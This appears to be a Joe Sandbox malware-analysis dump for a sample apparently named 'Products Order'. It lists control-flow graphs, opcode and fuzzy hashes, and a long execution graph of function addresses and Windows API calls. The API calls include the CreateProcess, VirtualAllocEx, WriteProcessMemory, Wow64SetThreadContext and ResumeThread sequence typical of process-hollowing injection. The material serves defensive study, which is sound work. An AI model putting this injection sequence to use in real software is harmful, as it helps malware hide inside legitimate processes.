Function_00007FF848F104D0 48->16 49 Function_00007FF848F10BD1 49->5 49->22 49->36 69 Function_00007FF848F104F0 49->69 50 Function_00007FF848F127D3 51 Function_00007FF848F12BD4 52 Function_00007FF848F11055 52->10 53 Function_00007FF848F10AD7 54->48 55 Function_00007FF848F13A59 55->17 56 Function_00007FF848F1025B 57 Function_00007FF848F108DC 57->11 58 Function_00007FF848F105DD 59 Function_00007FF848F11B5E 62 Function_00007FF848F104E0 59->62 63 Function_00007FF848F12BE0 64 Function_00007FF848F13BEA 65 Function_00007FF848F10CEA 66 Function_00007FF848F13F6D 67 Function_00007FF848F1016D 68 Function_00007FF848F10AF0 70 Function_00007FF848F108F1 71 Function_00007FF848F14171 72 Function_00007FF848F11CF4 73 Function_00007FF848F12575 73->31 74 Function_00007FF848F112F5 74->48

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: a3c14da99e1a65842fc476ea2f37c405b3eff33ee6e7f2d08c0834e52e5f955c
                    • Instruction ID: 0ed0a131770322dda4c2f05e67c7e2630e8f4ca26d138d82c2174b3a2f57bc17
                    • Opcode Fuzzy Hash: a3c14da99e1a65842fc476ea2f37c405b3eff33ee6e7f2d08c0834e52e5f955c
                    • Instruction Fuzzy Hash: EAF18F70919A8D8FEBA8EF18C8597E977E1FB59300F00412EDC4ED7291DB785A84CB85

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 110 7ff848f13f6d-7ff848f13f79 111 7ff848f13f7b-7ff848f13f83 110->111 112 7ff848f13f84-7ff848f1403c 110->112 111->112 116 7ff848f1403e-7ff848f14061 112->116 117 7ff848f14064-7ff848f140f6 WriteProcessMemory 112->117 116->117 119 7ff848f140f8 117->119 120 7ff848f140fe-7ff848f1416c 117->120 119->120
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 336001c5bb9605e0f662b860b26eb95c1dec9e57aed15c2a7ce276f8666eda4d
                    • Instruction ID: 3c8a0e39f7f76db837801d810ed5eeb469807d2d803ecf14e21c6460ba38e1df
                    • Opcode Fuzzy Hash: 336001c5bb9605e0f662b860b26eb95c1dec9e57aed15c2a7ce276f8666eda4d
                    • Instruction Fuzzy Hash: E8614970908A5C8FDB98DF58C885BE9BBF1FB69310F1082AAD44DE3255CB34A985CF40

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 123 7ff848f13bea-7ff848f13bf7 124 7ff848f13bf9-7ff848f13c01 123->124 125 7ff848f13c02-7ff848f13cc2 123->125 124->125 129 7ff848f13ce4-7ff848f13d46 Wow64SetThreadContext 125->129 130 7ff848f13cc4-7ff848f13ce1 125->130 132 7ff848f13d48 129->132 133 7ff848f13d4e-7ff848f13da4 129->133 130->129 132->133
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 88db76ad0eb66fd3041c2b655f0bb89fcd2f0b0858021af27899f80173fc62c2
                    • Instruction ID: facd82530c56bfda62d4d06f4c7c01c1407952f65b94254b8b4f0238e7b166ed
                    • Opcode Fuzzy Hash: 88db76ad0eb66fd3041c2b655f0bb89fcd2f0b0858021af27899f80173fc62c2
                    • Instruction Fuzzy Hash: BF517C70C0964D8FEB55DFA8C845BE9BBF1FF55310F1482AAD048E7292CB789885CB50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 136 7ff848f142cd-7ff848f1441b VirtualAllocEx 141 7ff848f1441d 136->141 142 7ff848f14423-7ff848f1447b 136->142 141->142
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: c793778bbee1f62cb06598881a9fc64c5aafcefbb2e3284aa6ef082433539049
                    • Instruction ID: 0320cc3069cd2c18161421729a32c6d99a8a1e4d05ceb32c15c8219efd0c1feb
                    • Opcode Fuzzy Hash: c793778bbee1f62cb06598881a9fc64c5aafcefbb2e3284aa6ef082433539049
                    • Instruction Fuzzy Hash: CD513770D0864C8FDB94EF58C885BE9BBF1FBA9310F1082AAD44DE3255DB34A8858F44

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 157 7ff848f1447d-7ff848f14489 158 7ff848f1448b-7ff848f14493 157->158 159 7ff848f14494-7ff848f14560 ResumeThread 157->159 158->159 164 7ff848f14568-7ff848f145b2 159->164 165 7ff848f14562 159->165 165->164
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 0171910073687a28403d97a5878babd3515dd6c1549f7f78118d2b41aedfcaff
                    • Instruction ID: 64b40253b51e309d6315e606f77e8be61f913240387d534efa9babffcf923f2e
                    • Opcode Fuzzy Hash: 0171910073687a28403d97a5878babd3515dd6c1549f7f78118d2b41aedfcaff
                    • Instruction Fuzzy Hash: E7413C70D0864D8FDB58EFA8D885AEDBBF1FB56310F10416AD409E7252DB74A885CB41

                    Execution Graph

                    Execution Coverage:30.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.4%
                    Total number of Nodes:1846
                    Total number of Limit Nodes:92
                    execution_graph 9723 40c640 9750 404bee 9723->9750 9726 40c70f 9727 404bee 6 API calls 9728 40c66b 9727->9728 9729 40c708 9728->9729 9731 404bee 6 API calls 9728->9731 9730 402bab 2 API calls 9729->9730 9730->9726 9732 40c683 9731->9732 9733 40c701 9732->9733 9734 404bee 6 API calls 9732->9734 9735 402bab 2 API calls 9733->9735 9738 40c694 9734->9738 9735->9729 9736 40c6f8 9737 402bab 2 API calls 9736->9737 9737->9733 9738->9736 9757 40c522 9738->9757 9740 40c6a9 9741 40c6ef 9740->9741 9743 405872 4 API calls 9740->9743 9742 402bab 2 API calls 9741->9742 9742->9736 9744 40c6c5 9743->9744 9745 405872 4 API calls 9744->9745 9746 40c6d5 9745->9746 9747 405872 4 API calls 9746->9747 9748 40c6e7 9747->9748 9749 402bab 2 API calls 9748->9749 9749->9741 9751 402b7c 2 API calls 9750->9751 9753 404bff 9751->9753 9752 404c3b 9752->9726 9752->9727 9753->9752 9754 4031e5 4 API calls 9753->9754 9755 404c28 9754->9755 9755->9752 9756 402bab 2 API calls 9755->9756 9756->9752 9758 402b7c 2 API calls 9757->9758 9759 40c542 9758->9759 9759->9740 9760 405941 9761 4031e5 4 API calls 9760->9761 9762 405954 9761->9762 8327 409046 8340 413b28 8327->8340 8329 40906d 8331 405b6f 6 API calls 8329->8331 8330 40904e 8330->8329 8332 403fbf 7 API calls 8330->8332 8333 40907c 8331->8333 8332->8329 8334 409092 8333->8334 8344 409408 8333->8344 8336 4090a3 8334->8336 8339 402bab 2 API calls 8334->8339 8338 402bab 2 API calls 8338->8334 8339->8336 8341 413b31 8340->8341 8342 413b38 8340->8342 8343 404056 6 API calls 8341->8343 8342->8330 8343->8342 8345 409413 8344->8345 8346 40908c 8345->8346 8358 409d36 8345->8358 8346->8338 8357 40945c 8464 40a35d 8357->8464 8359 409d43 8358->8359 8360 40a35d 4 API calls 8359->8360 8361 409d55 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409d8b 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409dd0 8364->8365 8366 405b6f 6 API calls 8365->8366 8367 409423 8365->8367 8370 409df7 8366->8370 8367->8357 8420 4056bf 8367->8420 8368 409e1c 8368->8367 8369 4031e5 4 API calls 8368->8369 8371 409e62 8369->8371 8370->8368 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8372->8368 8374 409e82 8373->8374 8375 4031e5 4 API calls 8374->8375 8376 409ea2 8375->8376 8377 4031e5 4 API calls 8376->8377 8378 409ec2 8377->8378 8379 4031e5 4 API calls 8378->8379 8380 409ee2 8379->8380 8381 4031e5 4 API calls 8380->8381 8382 409f02 8381->8382 8383 4031e5 4 API calls 8382->8383 8384 409f22 8383->8384 8385 4031e5 4 API calls 8384->8385 8388 409f42 8385->8388 8386 40a19b 8387 408b2c 4 API calls 8386->8387 8387->8367 8388->8386 8389 409fa3 8388->8389 8389->8367 8390 405b6f 6 API calls 8389->8390 8391 409fbd 8390->8391 8392 40a02c 8391->8392 8393 402bab 2 API calls 8391->8393 8394 4031e5 4 API calls 8392->8394 8419 40a16d 8392->8419 8396 409fd7 8393->8396 8397 40a070 8394->8397 8395 402bab 2 API calls 8395->8367 8398 405b6f 6 API calls 8396->8398 8399 4031e5 4 API calls 8397->8399 8401 409fe5 8398->8401 8400 40a090 8399->8400 8402 4031e5 4 API calls 8400->8402 8401->8392 8403 402bab 2 API calls 8401->8403 8404 40a0b0 8402->8404 8405 409fff 8403->8405 8407 4031e5 4 API calls 8404->8407 8406 405b6f 6 API calls 8405->8406 8408 40a00d 8406->8408 8409 40a0d0 8407->8409 8408->8392 8410 40a021 8408->8410 8412 4031e5 4 API calls 8409->8412 8411 402bab 2 API calls 8410->8411 8411->8367 8413 40a0f0 8412->8413 8414 4031e5 4 API calls 8413->8414 8415 40a110 8414->8415 8416 40a134 8415->8416 8417 4031e5 4 API calls 8415->8417 8416->8419 8474 408b2c 8416->8474 8417->8416 8419->8367 8419->8395 8421 402b7c 2 API calls 8420->8421 8423 4056cd 8421->8423 8422 4056d4 8425 408c4d 8422->8425 8423->8422 8424 402b7c 2 API calls 8423->8424 8424->8422 8426 413ba4 6 API calls 8425->8426 8427 408c5c 8426->8427 8428 408f02 8427->8428 8429 408f3a 8427->8429 8432 40903e 8427->8432 8431 405b6f 6 API calls 8428->8431 8430 405b6f 6 API calls 8429->8430 8446 408f51 8430->8446 8433 408f0c 8431->8433 8448 413aca 8432->8448 8433->8432 8437 408f31 8433->8437 8477 40a1b6 8433->8477 8435 405b6f 6 API calls 8435->8446 8436 402bab 2 API calls 8436->8432 8437->8436 8439 409031 8440 402bab 2 API calls 8439->8440 8440->8437 8441 409022 8442 402bab 2 API calls 8441->8442 8443 409028 8442->8443 8444 402bab 2 API calls 8443->8444 8444->8437 8445 402bab GetProcessHeap HeapFree 8445->8446 8446->8432 8446->8435 8446->8437 8446->8439 8446->8441 8446->8445 8447 40a1b6 14 API calls 8446->8447 8511 4044ee 8446->8511 8447->8446 8449 413ad7 8448->8449 8457 409451 8448->8457 8450 405781 4 API calls 8449->8450 8451 413af0 8450->8451 8452 405781 4 API calls 8451->8452 8453 413afe 8452->8453 8454 405762 4 API calls 8453->8454 8455 413b0e 8454->8455 8456 405781 4 API calls 8455->8456 8455->8457 8456->8457 8458 405695 8457->8458 8459 4056a0 8458->8459 8463 4056b9 8458->8463 8460 402bab 2 API calls 8459->8460 8461 4056b3 8460->8461 8462 402bab 2 API calls 8461->8462 8462->8463 8463->8357 8465 40a368 8464->8465 8466 40a39a 8464->8466 8471 4031e5 4 API calls 8465->8471 8467 40a3af 8466->8467 8468 4031e5 4 API calls 8466->8468 8469 40a3ca 8467->8469 8470 408b2c 4 API calls 8467->8470 8468->8467 8472 408b2c 4 API calls 8469->8472 8473 40a38a 8469->8473 8470->8469 8471->8473 8472->8473 8473->8346 8475 4031e5 4 API calls 8474->8475 8476 408b3e 8475->8476 8476->8419 8478 40a202 8477->8478 8479 40a1c3 8477->8479 8633 405f08 8478->8633 8481 405b6f 6 API calls 8479->8481 8483 40a1d0 8481->8483 8482 40a1fc 8482->8437 8483->8482 8485 40a1f3 8483->8485 8521 40a45b 8483->8521 8488 402bab 2 API calls 8485->8488 8486 402bab 2 API calls 8486->8482 8488->8482 8489 405b6f 6 API calls 8491 40a245 8489->8491 8490 40a25d 8492 405b6f 6 API calls 8490->8492 8491->8490 8493 413a58 13 API calls 8491->8493 8498 40a26b 8492->8498 8494 40a257 8493->8494 8497 402bab 2 API calls 8494->8497 8495 40a28b 8496 405b6f 6 API calls 8495->8496 8499 40a297 8496->8499 8497->8490 8498->8495 8500 40a284 8498->8500 8640 40955b 8498->8640 8504 40a2b0 8499->8504 8508 40a2b7 8499->8508 8647 40968e 8499->8647 8502 402bab 2 API calls 8500->8502 8502->8495 8503 405b6f 6 API calls 8503->8508 8505 402bab 2 API calls 8504->8505 8505->8508 8507 40a333 8507->8486 8508->8503 8508->8507 8510 402bab 2 API calls 8508->8510 8657 4098a7 8508->8657 8510->8508 8512 402b7c 2 API calls 8511->8512 8513 404512 8512->8513 8515 404585 GetLastError 8513->8515 8517 402bab 2 API calls 8513->8517 8519 40457c 8513->8519 8520 402b7c 2 API calls 8513->8520 8912 4044a7 8513->8912 8516 404592 8515->8516 8515->8519 8518 402bab 2 API calls 8516->8518 8517->8513 8518->8519 8519->8446 8520->8513 8666 40642c 8521->8666 8523 40a469 8524 40c4ff 8523->8524 8669 4047e6 8523->8669 8524->8485 8527 4040bb 12 API calls 8528 40bf88 8527->8528 8528->8524 8529 403c90 8 API calls 8528->8529 8530 40bfaa 8529->8530 8531 402b7c 2 API calls 8530->8531 8533 40bfc1 8531->8533 8532 40c4f3 8534 403f9e 5 API calls 8532->8534 8535 40c3aa 8533->8535 8676 40a423 8533->8676 8534->8524 8535->8532 8538 4056bf 2 API calls 8535->8538 8541 40c4e3 8535->8541 8536 402bab 2 API calls 8536->8532 8539 40c3d2 8538->8539 8539->8541 8543 4040bb 12 API calls 8539->8543 8541->8536 8542 405f08 4 API calls 8544 40c005 8542->8544 8545 40c3f3 8543->8545 8546 40c021 8544->8546 8679 40a43f 8544->8679 8548 40c4d1 8545->8548 8736 405a52 8545->8736 8547 4031e5 4 API calls 8546->8547 8551 40c034 8547->8551 8550 413aca 4 API calls 8548->8550 8555 40c4dd 8550->8555 8559 4031e5 4 API calls 8551->8559 8554 402bab 2 API calls 8554->8546 8557 405695 2 API calls 8555->8557 8556 40c411 8741 405a87 8556->8741 8557->8541 8565 40c04d 8559->8565 8560 40c4b3 8561 402bab 2 API calls 8560->8561 8563 40c4cb 8561->8563 8562 405a52 4 API calls 8573 40c423 8562->8573 8564 403f9e 5 API calls 8563->8564 8564->8548 8567 4031e5 4 API calls 8565->8567 8566 405a87 4 API calls 8566->8573 8568 40c085 8567->8568 8570 4031e5 4 API calls 8568->8570 8569 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8569->8573 8571 40c09c 8570->8571 8574 4031e5 4 API calls 8571->8574 8572 402bab 2 API calls 8572->8573 8573->8560 8573->8562 8573->8566 8573->8569 8573->8572 8575 40c0b3 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c0ca 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c0e7 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c100 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c119 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c132 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c14b 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c164 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c17d 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c196 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c1af 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c1c8 8596->8597 8598 4031e5 4 API calls 8597->8598 8599 40c1de 8598->8599 8600 4031e5 4 API calls 8599->8600 8601 40c1f4 8600->8601 8602 4031e5 4 API calls 8601->8602 8603 40c20d 8602->8603 8604 4031e5 4 API calls 8603->8604 8605 40c226 8604->8605 8606 4031e5 4 API calls 8605->8606 8607 40c23f 8606->8607 8608 4031e5 4 API calls 8607->8608 8609 40c258 8608->8609 8610 4031e5 4 API calls 8609->8610 8611 40c273 8610->8611 8612 4031e5 4 API calls 8611->8612 8613 40c28a 8612->8613 8614 4031e5 4 API calls 8613->8614 8617 40c2d5 8614->8617 8615 40c3a2 8616 402bab 2 API calls 8615->8616 8616->8535 8617->8615 8618 4031e5 4 API calls 8617->8618 8619 40c315 8618->8619 8620 40c38b 8619->8620 8682 404866 8619->8682 8621 403c40 5 API calls 8620->8621 8623 40c397 8621->8623 8625 403c40 5 API calls 8623->8625 8625->8615 8626 40c382 8627 403c40 5 API calls 8626->8627 8627->8620 8630 406c4c 6 API calls 8631 40c355 8630->8631 8631->8626 8706 4126a7 8631->8706 8634 4031e5 4 API calls 8633->8634 8635 405f1d 8634->8635 8636 405f55 8635->8636 8637 402b7c 2 API calls 8635->8637 8636->8482 8636->8489 8636->8490 8636->8507 8638 405f36 8637->8638 8638->8636 8639 4031e5 4 API calls 8638->8639 8639->8636 8641 409673 8640->8641 8646 40956d 8640->8646 8641->8500 8642 408b45 6 API calls 8642->8646 8643 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8643->8646 8644 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8644->8646 8645 402bab GetProcessHeap HeapFree 8645->8646 8646->8641 8646->8642 8646->8643 8646->8644 8646->8645 8648 4040bb 12 API calls 8647->8648 8650 4096a9 8648->8650 8649 40989f 8649->8504 8650->8649 8651 409896 8650->8651 8654 408b45 6 API calls 8650->8654 8655 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8650->8655 8656 402bab GetProcessHeap HeapFree 8650->8656 8905 4059d8 8650->8905 8652 403f9e 5 API calls 8651->8652 8652->8649 8654->8650 8655->8650 8656->8650 8658 4040bb 12 API calls 8657->8658 8664 4098c1 8658->8664 8659 4099fb 8659->8508 8660 4099f3 8661 403f9e 5 API calls 8660->8661 8661->8659 8662 4059d8 4 API calls 8662->8664 8663 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8663->8664 8664->8659 8664->8660 8664->8662 8664->8663 8665 402bab GetProcessHeap HeapFree 8664->8665 8665->8664 8667 4031e5 4 API calls 8666->8667 8668 406441 GetNativeSystemInfo 8667->8668 8668->8523 8670 4031e5 4 API calls 8669->8670 8672 40480a 8670->8672 8671 4031e5 4 API calls 8671->8672 8672->8671 8674 40484f 8672->8674 8675 40485d 8672->8675 8673 403c40 5 API calls 8673->8675 8674->8673 8675->8524 8675->8527 8677 4031e5 4 API calls 8676->8677 8678 40a435 8677->8678 8678->8542 8680 4031e5 4 API calls 8679->8680 8681 40a451 8680->8681 8681->8554 8683 4031e5 4 API calls 8682->8683 8684 40487c 8683->8684 8684->8626 8685 406c4c 8684->8685 8746 4068eb 8685->8746 8687 406e02 8687->8630 8688 406cab 8758 40469b 8688->8758 8689 406c6c 8689->8687 8689->8688 8755 406894 8689->8755 8696 406df1 8697 40469b 4 API calls 8696->8697 8697->8687 8698 406cef 8698->8696 8699 4031e5 4 API calls 8698->8699 8700 406d26 8699->8700 8700->8696 8701 40771e 6 API calls 8700->8701 8705 406d57 8701->8705 8702 406da2 8703 4031e5 4 API calls 8702->8703 8703->8696 8705->8702 8771 4068b0 8705->8771 8707 4126bb 8706->8707 8708 4126d1 8706->8708 8709 412840 8707->8709 8827 40488c 8707->8827 8708->8709 8833 407055 8708->8833 8709->8626 8713 412837 8714 403c40 5 API calls 8713->8714 8714->8709 8717 41281e 8718 4070ff 6 API calls 8717->8718 8718->8713 8719 407055 6 API calls 8720 412742 8719->8720 8720->8717 8721 40719a 6 API calls 8720->8721 8722 41276e 8721->8722 8735 412804 8722->8735 8849 406f4a 8722->8849 8725 41279a 8855 412553 8725->8855 8877 4070ff 8735->8877 8899 405907 8736->8899 8738 405a61 8739 405a76 8738->8739 8740 405907 4 API calls 8738->8740 8739->8556 8740->8738 8742 402b7c 2 API calls 8741->8742 8744 405a99 8742->8744 8743 405ade 8743->8573 8744->8743 8902 40595e 8744->8902 8774 4076a8 8746->8774 8748 406913 8749 406a61 8748->8749 8750 40771e 6 API calls 8748->8750 8749->8689 8754 406949 8750->8754 8751 40771e 6 API calls 8751->8754 8753 404678 4 API calls 8753->8754 8754->8749 8754->8751 8754->8753 8780 4046c2 8754->8780 8756 4031e5 4 API calls 8755->8756 8757 4068a6 8756->8757 8757->8689 8759 4046b4 8758->8759 8760 4046a4 8758->8760 8759->8687 8762 404678 8759->8762 8761 4031e5 4 API calls 8760->8761 8761->8759 8763 4031e5 4 API calls 8762->8763 8764 40468b 8763->8764 8764->8687 8765 40771e 8764->8765 8766 407737 8765->8766 8770 407748 8765->8770 8767 407644 6 API calls 8766->8767 8768 407741 8767->8768 8769 406baa 6 API calls 8768->8769 8769->8770 8770->8698 8772 4031e5 4 API calls 8771->8772 8773 4068c2 8772->8773 8773->8705 8775 4076c1 8774->8775 8779 4076d2 8774->8779 8788 407644 8775->8788 8779->8748 8781 4046d3 8780->8781 8782 4046d9 8780->8782 8823 40464c 8781->8823 8784 4046e9 8782->8784 8786 404678 4 API calls 8782->8786 8785 404714 8784->8785 8787 40469b 4 API calls 8784->8787 8785->8754 8786->8784 8787->8785 8789 407653 8788->8789 8790 407661 8788->8790 8789->8790 8796 406a6b 8789->8796 8792 406baa 8790->8792 8793 406bbb 8792->8793 8795 406bc8 8792->8795 8793->8795 8804 407402 8793->8804 8795->8779 8800 406a81 8796->8800 8797 402b7c 2 API calls 8797->8800 8798 406b8b 8798->8790 8799 406894 4 API calls 8799->8800 8800->8797 8800->8798 8800->8799 8801 406b96 8800->8801 8802 402bab 2 API calls 8800->8802 8803 402bab 2 API calls 8801->8803 8802->8800 8803->8798 8805 407644 6 API calls 8804->8805 8806 407412 8805->8806 8807 402b7c 2 API calls 8806->8807 8814 407450 8806->8814 8808 407483 8807->8808 8809 402b7c 2 API calls 8808->8809 8808->8814 8811 4074ce 8809->8811 8810 4074da 8812 4068cc 2 API calls 8810->8812 8811->8810 8813 402b7c 2 API calls 8811->8813 8812->8814 8817 40751f 8813->8817 8814->8795 8815 40752b 8816 4068cc 2 API calls 8815->8816 8816->8810 8817->8815 8819 4068cc 8817->8819 8820 4068d6 8819->8820 8821 4068e3 8819->8821 8820->8821 8822 402bab GetProcessHeap HeapFree 8820->8822 8821->8815 8822->8821 8824 404666 8823->8824 8825 404659 8823->8825 8824->8782 8826 4031e5 4 API calls 8825->8826 8826->8824 8828 4047e6 5 API calls 8827->8828 8829 404897 8828->8829 8830 40489c 8829->8830 8885 4047c7 8829->8885 8830->8708 8834 40706f 8833->8834 8835 407084 8833->8835 8834->8835 8836 407644 6 API calls 8834->8836 8840 4070e4 8835->8840 8888 406fd2 8835->8888 8837 40707d 8836->8837 8839 406baa 6 API calls 8837->8839 8839->8835 8840->8713 8841 40719a 8840->8841 8842 4071b0 8841->8842 8846 4071c5 8841->8846 8843 407644 6 API calls 8842->8843 8842->8846 8844 4071be 8843->8844 8845 406baa 6 API calls 8844->8845 8845->8846 8847 406fd2 4 API calls 8846->8847 8848 407226 8846->8848 8847->8848 8848->8717 8848->8719 8850 406f64 8849->8850 8853 406f75 8849->8853 8851 407644 6 API calls 8850->8851 8852 406f6e 8851->8852 8854 406baa 6 API calls 8852->8854 8853->8725 8854->8853 8896 4060ac 8855->8896 8878 407116 8877->8878 8879 40712b 8877->8879 8878->8879 8880 407644 6 API calls 8878->8880 8883 407187 8879->8883 8884 406fd2 4 API calls 8879->8884 8881 407124 8880->8881 8882 406baa 6 API calls 8881->8882 8882->8879 8883->8717 8884->8883 8886 4031e5 4 API calls 8885->8886 8887 4047d9 8886->8887 8887->8708 8889 406fde 8888->8889 8890 407027 8889->8890 8891 4031e5 4 API calls 8889->8891 8890->8840 8892 406ffa 8891->8892 8893 4031e5 4 API calls 8892->8893 8894 407011 8893->8894 8895 4031e5 4 API calls 8894->8895 8895->8890 8897 4031e5 4 API calls 8896->8897 8898 4060bb 8897->8898 8898->8898 8900 4031e5 4 API calls 8899->8900 8901 40591a 8900->8901 8901->8738 8903 4031e5 4 API calls 8902->8903 8904 405971 8903->8904 8904->8744 8906 4031e5 4 API calls 8905->8906 8907 4059ed 8906->8907 8908 402b7c 2 API calls 8907->8908 8911 405a38 8907->8911 8909 405a16 8908->8909 8910 4031e5 4 API calls 8909->8910 8909->8911 8910->8911 8911->8650 8913 4031e5 4 API calls 8912->8913 8914 4044b9 8913->8914 8914->8513 9834 40a349 9835 4098a7 13 API calls 9834->9835 9836 40a359 9835->9836 9073 408952 9094 40823f 9073->9094 9076 408960 9078 4056bf 2 API calls 9076->9078 9079 40896a 9078->9079 9122 408862 9079->9122 9081 4089c4 9082 413aca 4 API calls 9081->9082 9083 4089d4 9082->9083 9085 405695 2 API calls 9083->9085 9084 408975 9084->9081 9130 4087d6 9084->9130 9087 4089df 9085->9087 9092 402bab 2 API calls 9093 40899d 9092->9093 9093->9081 9093->9092 9095 40824d 9094->9095 9096 40831b 9095->9096 9097 4031e5 4 API calls 9095->9097 9096->9076 9110 4083bb 9096->9110 9098 40826d 9097->9098 9099 4031e5 4 API calls 9098->9099 9100 408289 9099->9100 9101 4031e5 4 API calls 9100->9101 9102 4082a5 9101->9102 9103 4031e5 4 API calls 9102->9103 9104 4082c1 9103->9104 9105 4031e5 4 API calls 9104->9105 9106 4082e2 9105->9106 9107 4031e5 4 API calls 9106->9107 9108 4082ff 9107->9108 9109 4031e5 4 API calls 9108->9109 9109->9096 9158 408363 9110->9158 9113 4084ab 9113->9076 9114 4056bf 2 API calls 9119 4083f4 9114->9119 9115 408492 9116 413aca 4 API calls 9115->9116 9117 4084a0 9116->9117 9118 405695 2 API calls 9117->9118 9118->9113 9119->9115 9161 40815d 9119->9161 9176 40805d 9119->9176 9191 404b8f 9122->9191 9124 40887e 9125 4031e5 4 API calls 9124->9125 9126 40893e 9124->9126 9128 402b7c 2 API calls 9124->9128 9129 408946 9124->9129 9125->9124 9194 404a39 9126->9194 9128->9124 9129->9084 9131 402b7c 2 API calls 9130->9131 9132 4087e7 9131->9132 9133 40885a 9132->9133 9134 4031e5 4 API calls 9132->9134 9142 408749 9133->9142 9135 408802 9134->9135 9138 40884d 9135->9138 9141 408853 9135->9141 9203 408522 9135->9203 9207 4084b4 9135->9207 9136 402bab 2 API calls 9136->9133 9210 4084d4 9138->9210 9141->9136 9143 404b8f 5 API calls 9142->9143 9145 408765 9143->9145 9144 4031e5 4 API calls 9144->9145 9145->9144 9146 408522 4 API calls 9145->9146 9147 4087c7 9145->9147 9149 4087cf 9145->9149 9146->9145 9148 404a39 5 API calls 9147->9148 9148->9149 9150 4085d1 9149->9150 9151 4086c2 9150->9151 9154 4085e9 9150->9154 9151->9093 9153 402bab 2 API calls 9153->9154 9154->9151 9154->9153 9155 4031e5 4 API calls 9154->9155 9216 4089e6 9154->9216 9235 4086c9 9154->9235 9239 4036a3 9154->9239 9155->9154 9159 4031e5 4 API calls 9158->9159 9160 408386 9159->9160 9160->9113 9160->9114 9162 40816f 9161->9162 9163 4081b6 9162->9163 9164 4081fd 9162->9164 9175 4081ef 9162->9175 9166 405872 4 API calls 9163->9166 9165 405872 4 API calls 9164->9165 9167 408213 9165->9167 9168 4081cf 9166->9168 9169 405872 4 API calls 9167->9169 9170 405872 4 API calls 9168->9170 9171 408222 9169->9171 9172 4081df 9170->9172 9173 405872 4 API calls 9171->9173 9174 405872 4 API calls 9172->9174 9173->9175 9174->9175 9175->9119 9177 40808c 9176->9177 9178 4080d2 9177->9178 9179 408119 9177->9179 9190 40810b 9177->9190 9181 405872 4 API calls 9178->9181 9180 405872 4 API calls 9179->9180 9183 40812f 9180->9183 9182 4080eb 9181->9182 9184 405872 4 API calls 9182->9184 9185 405872 4 API calls 9183->9185 9186 4080fb 9184->9186 9187 40813e 9185->9187 9188 405872 4 API calls 9186->9188 9189 405872 4 API calls 9187->9189 9188->9190 9189->9190 9190->9119 9197 404a19 9191->9197 9193 404ba0 9193->9124 9200 4049ff 9194->9200 9196 404a44 9196->9129 9198 4031e5 4 API calls 9197->9198 9199 404a2c RegOpenKeyW 9198->9199 9199->9193 9201 4031e5 4 API calls 9200->9201 9202 404a12 RegCloseKey 9201->9202 9202->9196 9204 408534 9203->9204 9206 4085af 9204->9206 9213 4084ee 9204->9213 9206->9135 9208 4031e5 4 API calls 9207->9208 9209 4084c7 9208->9209 9209->9135 9211 4031e5 4 API calls 9210->9211 9212 4084e7 9211->9212 9212->9141 9214 4031e5 4 API calls 9213->9214 9215 408501 9214->9215 9215->9206 9217 4031e5 4 API calls 9216->9217 9218 408a06 9217->9218 9219 4031e5 4 API calls 9218->9219 9222 408b21 9218->9222 9220 408a32 9219->9220 9228 408b17 9220->9228 9242 403666 9220->9242 9222->9154 9225 408b0e 9248 